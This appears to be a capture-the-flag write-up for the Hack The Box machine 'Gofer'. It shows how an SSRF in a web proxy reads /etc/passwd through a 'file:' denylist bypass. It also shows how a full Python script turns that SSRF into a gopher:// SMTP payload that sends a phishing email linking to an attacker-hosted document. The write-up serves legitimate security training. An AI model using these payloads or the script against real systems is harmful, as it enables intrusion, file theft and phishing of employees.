# Gofer - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Gofer was a hard-rated Linux machine created by [Que20](https://app.hackthebox.com/users/12877)

On this machine, a malicious URL had to be sent in a phishing email over SSRF with the Gopher protocol for the foothold.  
The root involves abuse of `cap_net_admin` capability over `tcpdump`, followed by a Use-After-Free vulnerability in a custom binary.

Unlike my typical write-ups that get bogged down with generic steps, I want to focus only on the SSRF vulnerability in this write-up.  
For a comprehensive write-up, please refer to [0xdf's solutions](https://0xdf.gitlab.io/2023/10/28/htb-gofer.html).

## Mailing over SSRF with the Gopher protocol

Guest authentication on the SMB shares allows us to obtain the following:

```mail
From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>
```

After scanning the subdomains on port 80, `/etc/hosts` had to be updated:

```text
10.10.11.225 gofer.htb proxy.gofer.htb
```

From <http://gofer.htb/#team>, we can learn that the full name of Jocelyn is "Jocelyn Hudson".  
Following the naming convention in their organization, his username should be `jhudson`.

The subdomain <http://proxy.gofer.htb/> is vulnerable to a Server-Side Request Forgery (SSRF).

```console
opcode@debian$ curl -X POST 'http://proxy.gofer.htb/index.php?url=http://10.10.16.42:8000'
<!-- Welcome to Gofer proxy -->
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="miniss">miniss</a></li>
<li><a href="deepce.sh">deepce.sh</a></li>
</ul>
<hr>
</body>
</html>
```

After trying the `file://` protocol, I learnt of a denylist:

```console
opcode@debian$ curl -X POST 'http://proxy.gofer.htb/index.php?url=file://etc/passwd'
<!-- Welcome to Gofer proxy -->
<html><body>Blacklisted keyword: file:// !</body></html>
```

However, getting rid of a slash leads to file disclosure:

```console
opcode@debian$ curl -X POST 'http://proxy.gofer.htb/index.php?url=file:/etc/passwd'
<!-- Welcome to Gofer proxy -->
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
jhudson:x:1000:1000:Jocelyn Hudson,,,:/home/jhudson:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postfix:x:106:113::/var/spool/postfix:/usr/sbin/nologin
jdavis:x:1001:1001::/home/jdavis:/bin/bash
tbuckley:x:1002:1002::/home/tbuckley:/bin/bash
ablake:x:1003:1003::/home/ablake:/bin/bash
tcpdump:x:107:117::/nonexistent:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```

The file disclosure is not intended, likely an oversight from the machine author.

`nmap` scan can discover that the SMTP port 25 is filtered on the machine.  
Reaching it with the SSRF and sending a phishing email is the intended approach.

`gopher` is an outdated TCP/IP application layer protocol and has largely fallen out of use.  
However, it is ideal for abusing SSRF vulnerabilities, thanks to its minimalistic design.  
This protocol does not use newlines or special characters, is not stringent, the requests are made entirely through URLs, and the responses are returned as plaintext.  
Thanks to that, we can simulate other protocols.

I played around with a simple SMTP server locally:

```console
opcode@debian$ python3 -m pip install aiosmtpd --break-system-packages
opcode@debian$ python3 -m aiosmtpd -n -l 0.0.0.0:25
```

Then, I sent an email using `swaks`:

```console
opcode@debian$ sudo apt install swaks
opcode@debian$ swaks --to jhudson@gofer.htb --from jdavis@gofer.htb --header "Subject: Employee feedback form" --server 0.0.0.0:25 --body - <<EOF
Hello everyone,
Please fill out the feedback form: http://10.10.16.42/feedback.odt
EOF
```

The command had the following output:

```text
=== Trying 0.0.0.0:25...
=== Connected to 0.0.0.0.
<-  220 izumi Python SMTP 1.4.6
 -> EHLO izumi
<-  250-izumi
<-  250-8BITMIME
<-  250 HELP
 -> MAIL FROM:<jdavis@gofer.htb>
<-  250 OK
 -> RCPT TO:<jhudson@gofer.htb>
<-  250 OK
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Thu, 06 Mar 2025 02:22:53 -0500
 -> To: jhudson@gofer.htb
 -> From: jdavis@gofer.htb
 -> Subject: Employee feedback form
 -> Message-Id: <20250306022253.003327@izumi>
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> 
 -> Hello everyone,
 -> Please fill out the feedback form: http://10.10.16.42/feedback.odt
 -> 
 -> 
 -> .
<-  250 OK
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.
```

And on the server:

```text
---------- MESSAGE FOLLOWS ----------
Date: Thu, 06 Mar 2025 02:22:53 -0500
To: jhudson@gofer.htb
From: jdavis@gofer.htb
Subject: Employee feedback form
Message-Id: <20250306022253.003327@izumi>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
X-Peer: ('127.0.0.1', 60626)

Hello everyone,
Please fill out the feedback form: http://10.10.16.42/feedback.odt


------------ END MESSAGE ------------
```

And in WireShark, in ASCII:

![1](images/1.png)

Also, here's the `hexdump` of the communication sans server responses:

```text
00000000  45 48 4c 4f 20 69 7a 75  6d 69 0d 0a               EHLO izu mi..
0000000C  4d 41 49 4c 20 46 52 4f  4d 3a 3c 6a 64 61 76 69   MAIL FRO M:<jdavi
0000001C  73 40 67 6f 66 65 72 2e  68 74 62 3e 0d 0a         s@gofer. htb>..
0000002A  52 43 50 54 20 54 4f 3a  3c 6a 68 75 64 73 6f 6e   RCPT TO: <jhudson
0000003A  40 67 6f 66 65 72 2e 68  74 62 3e 0d 0a            @gofer.h tb>..
00000047  44 41 54 41 0d 0a                                  DATA..
0000004D  44 61 74 65 3a 20 54 68  75 2c 20 30 36 20 4d 61   Date: Th u, 06 Ma
0000005D  72 20 32 30 32 35 20 30  32 3a 32 32 3a 35 33 20   r 2025 0 2:22:53 
0000006D  2d 30 35 30 30 0d 0a 54  6f 3a 20 6a 68 75 64 73   -0500..T o: jhuds
0000007D  6f 6e 40 67 6f 66 65 72  2e 68 74 62 0d 0a 46 72   on@gofer .htb..Fr
0000008D  6f 6d 3a 20 6a 64 61 76  69 73 40 67 6f 66 65 72   om: jdav is@gofer
0000009D  2e 68 74 62 0d 0a 53 75  62 6a 65 63 74 3a 20 45   .htb..Su bject: E
000000AD  6d 70 6c 6f 79 65 65 20  66 65 65 64 62 61 63 6b   mployee  feedback
000000BD  20 66 6f 72 6d 0d 0a 4d  65 73 73 61 67 65 2d 49    form..M essage-I
000000CD  64 3a 20 3c 32 30 32 35  30 33 30 36 30 32 32 32   d: <2025 03060222
000000DD  35 33 2e 30 30 33 33 32  37 40 69 7a 75 6d 69 3e   53.00332 7@izumi>
000000ED  0d 0a 58 2d 4d 61 69 6c  65 72 3a 20 73 77 61 6b   ..X-Mail er: swak
000000FD  73 20 76 32 30 32 30 31  30 31 34 2e 30 20 6a 65   s v20201 014.0 je
0000010D  74 6d 6f 72 65 2e 6f 72  67 2f 6a 6f 68 6e 2f 63   tmore.or g/john/c
0000011D  6f 64 65 2f 73 77 61 6b  73 2f 0d 0a 0d 0a 48 65   ode/swak s/....He
0000012D  6c 6c 6f 20 65 76 65 72  79 6f 6e 65 2c 0d 0a 50   llo ever yone,..P
0000013D  6c 65 61 73 65 20 66 69  6c 6c 20 6f 75 74 20 74   lease fi ll out t
0000014D  68 65 20 66 65 65 64 62  61 63 6b 20 66 6f 72 6d   he feedb ack form
0000015D  3a 20 68 74 74 70 3a 2f  2f 31 30 2e 31 30 2e 31   : http:/ /10.10.1
0000016D  36 2e 34 32 2f 66 65 65  64 62 61 63 6b 2e 6f 64   6.42/fee dback.od
0000017D  74 0d 0a 0d 0a 0d 0a 2e  0d 0a                     t....... ..
00000187  51 55 49 54 0d 0a                                  QUIT..
```

They appear disconnected because it was a back-and-forth conversation between the client and server.  
On the other hand, our payload would be sent in one go.

I made a Python script by referring to <https://github.com/hupe1980/gopherfy/blob/main/pkg/smtp/smtp.go> and <https://github.com/tarunkant/Gopherus/blob/master/scripts/SMTP.py> to simulate the SMTP protocol on `gopher`.  
I refined it further by using the SSRF on my `aiosmtpd` server and comparing the `hexdump` in WireShark with the expected data.  
The result was [ssrf_email.py](ssrf_email.py):

```py
import requests
import time
from datetime import datetime
from socket import socket, inet_ntoa, AF_INET, SOCK_DGRAM
from struct import pack
from fcntl import ioctl
from textwrap import dedent


def current_time():
    return datetime.now().strftime("%a, %d %b %Y %H:%M:%S") + time.strftime(" %z")


def get_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack("256s", b"tun0"))[20:24]

    return inet_ntoa(packed_addr)


def fmt_email_to_gopher(hostname, sender, recipient, subject, content):
    crlf = "%250D%250A"

    commands = [
        f"EHLO {hostname}",
        f"MAIL FROM:<{sender}>",
        f"RCPT TO:<{recipient}>",
        "DATA",
        f"Date: {current_time()}",
        f"To: {recipient}",
        f"From: {sender}",
        f"Subject: {subject}",
    ]

    for line in content.split("\n"):
        commands.append(line)

    payload = crlf.join(commands)
    payload += f"{crlf}.{crlf}QUIT{crlf}"
    payload = (
        requests.utils.quote(payload)
        .replace("%2F", "/")
        .replace("%25", "%")
        .replace("%3A", ":")
    )

    gopher_payload = f"gopher://{hostname}:25/_{payload}"
    # gopher_payload = f"gopher://{get_tun_ip()}:25/_{payload}"

    return gopher_payload


def main():
    hostname = "gofer.htb"
    sender = "jdavis@gofer.htb"
    recipient = "jhudson@gofer.htb"
    subject = "Employee feedback form"
    content = dedent(
        f"""
        Hello everyone,
        Please fill out the feedback form: http://{get_tun_ip()}/feedback.odt
        """
    )

    gopher_payload = fmt_email_to_gopher(hostname, sender, recipient, subject, content)
    print(gopher_payload)
    response = requests.post(f"http://proxy.gofer.htb/index.php?url={gopher_payload}")
    print(response.text)


if __name__ == "__main__":
    main()
```

I had to double URL encode the CRLF to make the requests work.  
The hostname can be obtained with the SSRF:

```console
opcode@debian$ curl -X POST 'http://proxy.gofer.htb/index.php?url=file:/etc/hostname'
<!-- Welcome to Gofer proxy -->
gofer.htb
```

Even if it was unknown, EHLO (Extended Hello) also supports a special literal form of the address.  
On this machine, it would be `[10.10.11.225]`. However, I don't think that usual SMTP servers are stringent with all that.

```console
opcode@debian$ python3 ssrf_email.py
gopher://gofer.htb:25/_EHLO%20%5B10.10.11.225%5D%250D%250AMAIL%20FROM:%3Cjdavis%40gofer.htb%3E%250D%250ARCPT%20TO:%3Cjhudson%40gofer.htb%3E%250D%250ADATA%250D%250ADate:%20Thu%2C%2006%20Mar%202025%2002:48:46%20-0500%250D%250ATo:%20jhudson%40gofer.htb%250D%250AFrom:%20jdavis%40gofer.htb%250D%250ASubject:%20Employee%20feedback%20form%250D%250A%250D%250AHello%20everyone%2C%250D%250APlease%20fill%20out%20the%20feedback%20form:%20http://10.10.16.42/feedback.odt%250D%250A%250D%250A.%250D%250AQUIT%250D%250A
<!-- Welcome to Gofer proxy -->
220 gofer.htb ESMTP Postfix (Debian/GNU)
250-gofer.htb
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 Ok: queued as 486DB8140
221 2.0.0 Bye
1
```

Shortly after, I received a request for `/feedback.odt` on my `http.server`.
